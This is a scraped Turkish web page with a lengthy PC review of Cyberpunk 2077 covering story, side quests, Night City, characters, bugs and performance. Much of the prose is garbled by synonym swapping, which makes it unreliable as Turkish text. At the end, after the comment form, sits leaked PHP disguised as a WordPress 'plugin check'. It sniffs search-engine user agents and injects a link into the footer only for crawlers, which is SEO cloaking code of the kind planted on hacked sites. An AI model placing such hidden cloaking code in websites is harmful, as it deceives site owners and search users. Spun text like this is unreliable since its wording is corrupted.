Sıradaki içerik:

Samsung Galaxy S21 Ultranın Özellikleri Ortaya Çıktı

e
sv

Cyberpunk 2077 İncelemesi [PC]

19 Aralık 2020 17:17
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

The Witcher serisi ile güven kazanan CD Projekt RED'in yıllardır beklenen oyunu Cyberpunk'ı sonun da oynadık. Özellikle PS4 başta olmak üzere konsol cephesinde yaşananlar, oyunun PlayStation Store'dan silinmesine bile sebep olmuştu.

Cyberpunk 2077'yi oynarken kulaklarımızı öbür eleştirilere kapadık ve olası olduğunca oyuna kendimizi vermeye çalıştık. Sizin için hikayeden olabildiğince az spoiler içeren, detaylı bir inceleme yazısı hazırladık.

Hikâye: Devrim niteliğinde olmasa da sürükleyici bir hikâye, ancak kararlarınızın bir önemi yok

cyberpunk 2077 judy

Hikayenin artıları:Sürükleyici, aksiyonu noksan olmayan hadise örgüsüJohnny Silverhand karakteri ile işlenen harika bir çift kafa kahraman hikâyesiHikayeye katkısı olan Türkçe tercüme (Ancak yapılan o büyük ayıbı da unutmadık)Eksileri:Gidişatı etkilemeyen “özel” diyalog seçenekleriÇoğu zaman oyunun sizi yönlendirdiği diyalog seçenekleriYalnızca ilk yarım saat için değişik bir deneyim sunan farklı yaşam yolları

Oyunun hikâyesi yer yer doğru klişelerle süslenen, güçlü bir sunuma sahip. Gitgide kendine bağlayan ve ana hikâyeden uzaklaşıp yan görevlere odaklanmayı zorlaştıran bir yapısı var. Tempo yer yer yavaşlasa da bol bol aksiyonla süslenmiş sürükleyici bir hikâye akışıyla karşı karşıyayız. Johnny Silverhand (Keanu Reeves) gibi hikâye anlatımına katkısı alelade bir karakterden fazla daha fazlası olan bir faktör da eklenince oyun epey ilgi çekici bir hâl alıyor.

Hikaye gereği bilincimizde yer saha Johnny Silverhand, vereceğimiz kararlara deyim yerindeyse daimi maydanoz oluyor. Bu sayede dışarıdan tek bir karakter olarak görünen V, kendi içinde çift karakterli olmamak adına bir muharebe veriyor. Hikâyenin tek vücut üzerinde çift kafa kahraman üzerinden anlatılması, daha önce eşi benzeri görülmemiş bir yöntem olmasa bile oyuna beklenmedik bir katman ekliyor. Ancak hikâyede yakalanan derinliğe, bir rol yapma oyunundan beklendiği üzere olaylara yön verme tarafında çoğu zaman rastlanamıyor.

Ayrıca Cyberpun 2077, seçim yapıyormuş hissini vermeyi çoğu zaman başaramıyor. Belli noktalarda karakterimizin geçmişine veya yeteneklerine bağlı olarak karşılaştığımız ekstra diyalog seçenekleri sıklıkla sohbeti uzatmaktan öteye geçemiyor. Buna ilave olarak olayların gidişatına yön vermek adına kararlar alabileceğimiz noktalarda oyuncu ne demeyi seçerse seçsin CD Projekt RED’in istediği senaryoya zorlandığı zamanlar oluyor. Sinematik sunumu güçlendirmek adına yapılan bu seçim amacına ulaşıyor, ancak rol yapma dokusunu oyundan söküp atıyor.

Türkçe yerelleştirmenin hikayeye etkisi büyük:

cyberpunk 2077 gece kulübü

Böylesine kapsamlı oyunlarda Türkçe dili görmek alışık olduğumuz bir hal değil. O yüzden Cyberpunk 2077’nin harika bir Türkçe desteğiyle gelmesi deneyime tertip atlatıyor. Çeviriyi profesyonel bir ekibin yaptığı belli. Tabirler, deyimler, sokak dili gibi iyi tercüme için kritik olan noktalarda özenle davranılmış. Çevirinin kalitesini açıklamak için ‘netrunner’ yerine kullanılan “ağgezer” kelimesi fazla güzel bir örnek.

Oyun çıktıktan birkaç gün sonra fark edilen tatsız bir hatalı tercüme vakası olduğunu aktarmıştık. Ancak burada bir fena niyet aramak istemiyor, oyun sektörüne ve Türkiye'de bu sektör sayesinde geçinen öbür insanların önüne taş koyacak eleştirilerden şimdilik kaçınıyoruz. Odaklandığımız nokta tercüme şirketinin hatası değil, CD Projekt RED'in ürünü.

Yan görevler: Cyberpunk 2077'de ana hikâyeyi aratmayan yan görevler var

cyberpunk 2077 motosiklet

 

Artıları: Merak unsurunu tetikleyen, tamamlamaya değen hikayelerİyi sonlara ulaşabilmek için yan vazife tamamlama zorunluluğuEksileri:İyi sonlara ulaşabilmek için yan vazife tamamlama zorunluluğunu bir eksi olarak da ele alabiliriz.Gwent benzeri bir mini oyunun eksikliği

Zengin bir yan vazife kataloğuyla karşı karşıyayız. Hatta bir yan göreve giderken bile yolumuzdan sapıp telefonumuza gelen yeni bir göreve doğru direksiyon salladığımız anlar olabiliyor. Yan görevler arasında karar vermeye çalışırken de daimi olarak araba satmaya çalışan karakterlerden gelen mesaj tacizine maruz kalıyoruz. İşte yan vazife tarafında böyle bir karmaşa var.

Tüm bu karmaşa içerisinde harika hikâyelere sahip yan görevler de bulunuyor. Yan görevler de bazen tıpkı ana hikâyede rastladığımız derinliğe sahip olduğu için bir yerden sonra yan vazife yapıldığı unutulabiliyor. Yani en az ana hikâye kadar güçlü yan görevlerle karşılaşmak mümkün. Night City’de kırılan hayallerin yanı dizi yerine getirilen sözler de var.

Yan görevlerin ana hikâyeye katkısı, oyunun sonunda büyük bir öneme sahip oluyor. Kimi oyuncular için güzel olsa da bazen oyuncular bu durumdan yakınacaktır. Her oyuncu önüne gelen tüm görevleri yapmayı sevmek zorunda değil. Bizce yan görevlerle hikâyenin sunumu güçlense de sadece ana hikâye üzerinden nispeten daha iyi sonlara ulaşmayı imkansız hâle getirmesinden ötürü burada kararı her oyuncu kendi vermeli.

Tatmin edici bir mini oyun bulunmuyor:

cyberpunk 2077 viktor

The Witcher 3 ile aramıza katılan Gwent'in ulaştığı popülerlik itibarıyla kendine özel bir oyuna kavuşmasına rağmen Cyberpunk 2077'de de benzer bir mini oyuna yer verilmemesi kaçan bir fırsat. Cihazlara sızarken oynadığımız bir hackleme mini oyunu bulunuyor ancak bu oyunu ana oyunda bir hedefi yerine getirmek amacıyla oynadığımız için Gwent'e benzer bir dokusu yok.

Aynı zamanda Gwent'in sahip olduğu kompleks yapıyla alakası bile yok. CD Projekt RED'in kendi başardığı şeylerden bile ilham almadığı noktalar görmek gerçekten şaşırtıcı.

Açık dünya: Night City acımasız, kalabalık ve fırsatlarla dolu bir şehir

cyberpunk 2077 dünya

Artıları:Şu ana kadar yaratılan en diri açık dünyalardan biriAçık dünya o kadar dolu ki ana hikayeyi bir çırpıda bitirmek imkansızEksileri:Kısa sürede tekrara düşen, otomatik olarak oluşturulan anlık aktivitelerKalabalık ortamlarda tıpatıp aynı animasyona ve çizime sahip NPC'ler

Açık dünyası olan oyunlarda yıkık dökük şehirler görmeye o kadar alışmışız ki Night City farkını anında ortaya koyuyor. Meydanlarda ve fasıla sokaklarda daimi bir insan kalabalığının ve curcunanın içindeyiz (Hoş bu hal konsolda böyle değildi, ancak PC'de hal böyle). Şehirdeki Her NPC’nin kendine ait bir hayatı olduğunu söylemek olası olmasa da diri hissettirmeyi bir nebze hissettiren bir açık dünya var.

Night City sadece kalabalık yerlerden ibaret değil. Tehlikeyi iliklerimize kadar hissettiğimiz ıssız bölgeler, şirketlerin oyun sahası olmuş bu şehrin gerçek yüzü. Bizleri ana hikâyeye olan bağlılığımızdan koparıp şehrin sokaklarında kaybolmamızı sağlayan maceralar tam da bu bölgelerde yer alıyor.

Açık dünyanın hayal kırıklığına sebep olduğu önemli bir nokta, “şüphelileri etkisiz hâle getir”, ”rehineleri kurtar” benzeri otomatik olarak üretilen görevlerde yeterli çeşitlilik sunulmaması. Bu tarz aktiviteler o kadar fazla tekrar edip sıradanlaşıyor ki bir yerden sonra arabayla yanlarından geçtiğimiz birer simge olmaktan öteye gidemiyorlar. Açık dünyanın kendini yine ettiği bir öbür nokta da aynı ortamda denk gelinebilen birbirinin kopyası NPC’ler. Bu NPC’leri gördükçe o kalabalığın bilgisayarı yorduğuna değiyor mu sorusunu sormadan edemiyorsunuz.

Karakterler: Cyberpunk 2077'nin yaptığı en doğru şey

cyberpunk 2077 jackie welles

Karakterler hayatımıza girebilecek gerçek insanlar gibiler, güçlü ve zayıf yönleri varOyuncu ve karakterler arasında kurulan bağ hikayede önemli bir yere sahip

Kimsenin birbirine güvenmediği Night City’de şayet bir karakter bize güvenirse bunu ilk saniyeden anlayabiliyoruz. Aynı şekilde güvenebileceğimizi anladığımız bir karakter bulduğumuzda içimiz rahatlıyor. Cyberpunk 2077’de kurulan dünya işte böyle bir yer. Gerçek hayatta karşılaşabileceğimiz karakterlerle doluymuş gibi hissettiriyor.

Keanu Reeves tarafından canlandırılan Johnny Silverhand dışındaki Judy, Evelyn, Jackie, Viktor gibi karakterler bile fazla diri hissettirip kendilerine bağlamanın bir yolunu buluyor. Tabii ki hiçbiri Johnny Silverhand kadar başarılı değil. Zaten hikaye tarafından ön planda tutulan Johnny Silverhand’in gerçek bir aktör tarafından canlandırılması, karakteri bambaşka bir seviyeye çıkartıyor.

Oynanış: Bitmemiş bir oyunun çırpınışları

cyberpunk 2077 sokak

Artıları:Oynanışa göre artan alt yeteneklerFarklı araçlarda bulunan farklı sürüş hissiyatıSavaş stillerindeki zenginlikHackleme mekaniklerinin kolay kullanımıEksileri:Bazı oyuncuların karşılaştığı, deneyimi baltalayan hatalarGenel anlamda iyi olan yapay zekâ zaman vakit ağır saçmalıyorGörevler haricinde yaptığımız şeylerin gerçek sonuçları olmuyor

Oyun fazla geniş bir yetenek ağacına sahip olmasının yanı dizi oynanışa odaklı olarak gelişen alt yeteneklere de sahip. Yetenek ağacına sahip oyunlarda, oyuncunun oyunu oynama tarzına göre şekillenen yetenekler olmasının önemi, oyunda birkaç saat ilerledikçe anlaşılıyor. Örneğin taarruz tüfeği kullanmayı tercih ettiyseniz, saatler geçtikçe taarruz tüfeğiyle düşmana verdiğiniz hasar kendiliğinden artıyor.

Karşımızda genel anlamda olmasa da oynanış anlamında çeşitli bir oyun var. Oyunun ayrıntılı yetenek ağacı, silah skalası, bu silahları kullanarak yapabileceğimiz saldırılar, farklı arabalar ve özellikle motosiklet sürerken karşılaşılan farklı sürüş hissiyatı oyuna bir albeni katıyor. Oyun, oyuncuyu alıştırmak için yeteri kadar bilgi vermiyor ancak bir kere alıştıktan sonra bahsettiğimiz albeni kendini iyiden iyiye göstermeye başlıyor.

Biz kendi deneyimimizde nadiren karşılaşsak da oyunu bilgisayarda oynayan insanların karşılaştıkları büyük hatalar var. Skyrim ve Fallout gibi açık dünya oyunlarında karşılaşıldığı zaman göze bu kadar batmayan benzer hatalar Cyberpunk 2077 gibi sinematik sunumu temel almış bir açık dünya oyununda daha fazla rahatsız ediyor. Kimi zaman yapay zekânın da nasibini aldığı bu hataların zaman içerisinde gelen güncellemelerle giderilmesi mümkün. CDPR’ın önceki oyunlarının da çıkış zamanı hatalarla boğuştuğu olmuştu.

Öyle vadedilen bir özgürlük bulunmuyor:

cyberpunk 2077 keanu reeves

Cyberpunk 2077 bazı noktalarda tatmin edici bir çeşitlilik sunsa da genele bakıldığında aslında rol yapma öğeleri barındıran bir aksiyon-nişancı oyunu. Oyun, hikâye tarafında sahip olduğu çizgiselliği oynanışta da yer yer yaşatıyor. Açık dünyada gezerken yaptığımız şeylerin gerçek sonuçları yok. Bir oyunu çizgiselliği üzerinden eleştirmek her zaman doğru bir yaklaşım değil ancak CD Projekt RED’in yaptığı açıklamalarla oyuncuları soktuğu beklenti fazla yönlü bir rol yapma oyunuydu. Cyberpunk 2077’nin tam teşekküllü bir rol yapma oyunu olduğunu söylemek ise olası değil.

Sonuç: Performans sorunları, hatalar ve yaratılan yanlış beklentilerin altında ezilse de iyi bir oyun (Geriye bir şey kalıyorsa tabii)

cyberpunk 2077 ışın izleme

Artıları:Harika bir hikâye, daha da iyi bir sunumÇok çeşitli oynanışın kazandırdığı derinlikOyuncuya kendini sevdiren güçlü karakterlerNefes kesici grafikler (DLSS zaman vakit görüntüde bozulmalara sebep olsa da)Eksileri:Özellikle eski nesil konsollarda beklenenden ve vadedilenden fazla uzak bir deneyimOyunun bir kere daha ertelenmesi gerektiğini düşündürten bazı hatalarCD Projekt RED tarafından belirtilen, gerçekle örtüşmeyen sistem gereksinimleri

Cyberpunk 2077 bizim 40 saatlik deneyimimize göre hatalardan ötürü oynanamayacak bir durumda değil. Ancak bunu söyleyebilmemizin sebebi hem bilgisayarda oynamamız hem de şanslı tarafta olmamız. Oyunu konsollarda deneyimleyenler ve bazı bilgisayar oyuncuları yüklenmeyen dokular, bomboş bir Night City veya gırla hata yüzünden CD Projekt RED’i topa tutuyorlar. Hiçbir erteleme almasaydı eski nesil konsollar ve Nvidia 2000 serisi ekran kartları son modelken çıkacak bir oyunun teknik anlamda bu kadar fena bir deneyim sunması kabul edilebilir bir hal değil.

Not: CDPR CEO’su Adam Kicinski, kasım ayında oyunun eski nesil konsollarda beklenmedik bir şekilde iyi çalıştığını söylemişti…

Bilgisayarda oynarken şanslı tarafta yer almamız bile oyunun fena performansının önüne geçemedi. Işın izleme ve DLSS açıkken RTX 2000 serisi ekran kartlarla stabil 60 kare alabilmek olası değil. CD Projekt RED ayrıntılı bir sistem gereksinimleri listesi yayınladığı zaman olumlu yönde beklentiler oluşmuştu ancak görünen o ki o listede saniye başına 30 kare hedeflenmiş. Bilgisayar oyunlarında genel olarak kabul gören paha 60 kare olduğu için ne kadar süslü bir şekilde hazırlanmış olursa olsun Cyberpunk 2077 için de sistem gereksinimleri öbür her büyük çaplı oyun gibi kağıt üzerinde kalıyor.

Her şeye rağmen Cyberpunk 2077 sunduğu hikâye ve oynanışının çeşitliliği ile geçer not almayı adalet eden bir oyun. CD Projekt RED’in oyunu tanıttığı yıllar içerisinde hiç gerek yokken belirlediği ve nihayetinde ulaşamadığı yüksek çıta olmasaydı oyun tüm teknik sıkıntılarına rağmen bu kadar eleştiri almazdı. Ancak belirtmemiz gerekiyor ki oyun bu haliyle fazla büyük değişimler yaşamadığı sürece birçok eleştirmen tarafından ezbere verilen fazla yüksek puanları adalet etmekten fazla uzak bir noktada.

Gamescom 2020'de Yılın En İyi PC Oyunu seçilmiş, PC oyun tarihinin en iyi çıkış yapan oyunu olmuştu: Ancak Cyberpunk 2077 bu unvanları adalet etmiyor (şimdilik)

cyberpunk 2077

Oyun dünyasında önemli bir kesim CD Projekt RED'in 2007'deki ilk Witcher oyununda da fazla sayıda problem olduğunu, ancak serinin zamanla bir efsaneye dönüştüğünü hatırlatıyor. Ancak Cyberpunk 2077, daha çıkmadan yarattığı heyecan fırtınasının kurbanlarından birisi olmuş görünüyor. PC sürümü konsollara kıyasla daha az problem barınsa da ilerleyen yıllarda düzeltmenin zor olacağı yapay zeka gibi çok ciddi problemlere sahip.

2020 Gamescom etkinliğinde En İyi PC Oyunu dahil 5 ödül birdenbire alan, ertlemelerin ardından Kasım ayında tarihin en iyi çıkışını yapan PC oyunu gibi unvanlar, ne yazık ki Cyberpunk 2077'nin adalet ettiği unvanlar değil. En azından oyunun temel sorunları çözülene kadar sipariş vermemenizi tavsiye ediyoruz. Son olarak Cyberpunk 2077 sayesinde, yeni çıkan bir oyunu hemen almak yerine kararlı sürüme kavuşmasını beklemenin ne kadar mantıklı bir tercih olduğunu vurgulamak istiyoruz.

Cyberpunk 2077 incelemesinin oynandığı sistem bilgileri:

Ekran kartı: RTX 2070 SuperBellek: 16 GBİşlemci: Intel i5-8400Çözünürlük: 2560x1440Depolama birimi: SSD

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');